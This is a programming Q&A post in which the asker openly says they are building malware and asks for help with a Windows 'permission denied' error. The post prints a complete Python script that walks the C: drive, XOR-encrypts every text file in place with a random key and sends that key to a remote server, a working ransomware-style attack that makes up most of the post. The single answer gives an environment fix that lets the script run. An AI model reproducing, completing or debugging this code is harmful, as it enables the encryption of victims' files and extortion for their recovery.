# how to open a file that's giving me a "permission denied [error 13]" error in python?

Tags: python, python-3.x, windows, io

So I'm trying to build a malware that looks for all the text files in your system and XORs them with a key then sends the key to the server. The functionality works fine but I'm having issues with permission rights for opening the files in windows. I don't understand why I'm getting this considering I am the admin. Running in admin mode doesn't help. The code is below. Thanks in advance

```
import socket, os, string, random, ctypes, sys

# SERVER_IP = '127.0.0.1'
SERVER_IP = '192.168.128.1'
SERVER_PORT = 5678
KEY = ''.join(random.choices(string.printable.strip(), k=16)) # generate 16 character key ( without space )
TXT_FILES_ARRAY = []

# Check if a user is an admin

# def is_admin():
#     try:
#         return ctypes.windll.shell32.IsUserAnAdmin()
#     except:
#         return False

# function to xor a string with a key
def xor(s, key):
    return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(s)) 

# Find all text files in a particular directory
count = 0
ext = ".txt"
for root, dirs, files in os.walk("C:\\"): # change the hard drive, if you want
    for file in files:
        filepath = os.path.join(root, file)
        if 'AppDAta' in file:
            continue
        if ext in file:
            count +=1
            print(filepath)
            TXT_FILES_ARRAY.append(filepath)
print(f'I have {count} text files in my system')

# XOR file with randomly generated key
for idx, i in enumerate(TXT_FILES_ARRAY):
    with open(TXT_FILES_ARRAY[idx], "r+", errors="ignore") as file:
        file_read_data = ''.join(file.readlines())
        file.seek(0) # go to the beginning of the file
        file.write(xor(file_read_data, KEY)) # XOR the key with the file data
        file.truncate() # remove the rest of the file
        file.close()

with socket.socket(socket.AF_INET , socket.SOCK_STREAM) as s:
    s.connect((SERVER_IP, SERVER_PORT))
    data = s.recv(1024)
    print(data)
    s.send(bytes(KEY, 'utf-8'))
exit()
```

Answer (score 0):

I'm posting this in the hope it would help someone out in the future.
The issue was the fact that I installed python from the Microsoft app store, not from the official website. Once I uninstalled it, I disabled app aliases, and set environmental paths for script and python310. everything worked great!